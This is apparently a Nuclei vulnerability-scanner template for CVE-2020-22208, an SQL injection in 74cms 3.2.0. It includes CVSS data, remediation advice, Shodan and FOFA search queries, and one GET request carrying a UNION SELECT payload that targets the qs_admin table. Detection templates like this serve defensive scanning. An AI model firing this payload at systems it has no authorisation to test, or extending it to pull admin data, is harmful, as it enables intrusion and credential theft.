44 lines
1.4 KiB
YAML
44 lines
1.4 KiB
YAML
id: CVE-2020-22208
|
||
|
||
info:
|
||
name: 74cms - ajax_street.php 'x' SQL Injection
|
||
author: ritikchaddha
|
||
severity: critical
|
||
description: |
|
||
SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.
|
||
remediation: |
|
||
Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability.
|
||
reference:
|
||
- https://github.com/blindkey/cve_like/issues/10
|
||
- https://nvd.nist.gov/vuln/detail/CVE-2020-22208
|
||
classification:
|
||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
cvss-score: 9.8
|
||
cve-id: CVE-2020-22208
|
||
cwe-id: CWE-89
|
||
epss-score: 0.13124
|
||
epss-percentile: 0.94973
|
||
cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*
|
||
metadata:
|
||
max-request: 1
|
||
vendor: 74cms
|
||
product: 74cms
|
||
shodan-query: http.html:"74cms"
|
||
fofa-query: app="74cms"
|
||
tags: cve,cve2020,74cms,sqli
|
||
variables:
|
||
num: "999999999"
|
||
|
||
http:
|
||
- method: GET
|
||
path:
|
||
- '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<31>%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#'
|
||
|
||
matchers:
|
||
- type: word
|
||
part: body
|
||
words:
|
||
- '{{md5({{num}})}}'
|
||
|
||
# digest: 4b0a00483046022100fbc4e1fa4311b31757a3963dda56436b800eb5efbc7e0643777bf576f762a4d9022100f6439163be3346fcc47bd664beb807ec5298d67cf302c9674213fe7e132203aa:922c64590222798bb761d5b6d8e72950
|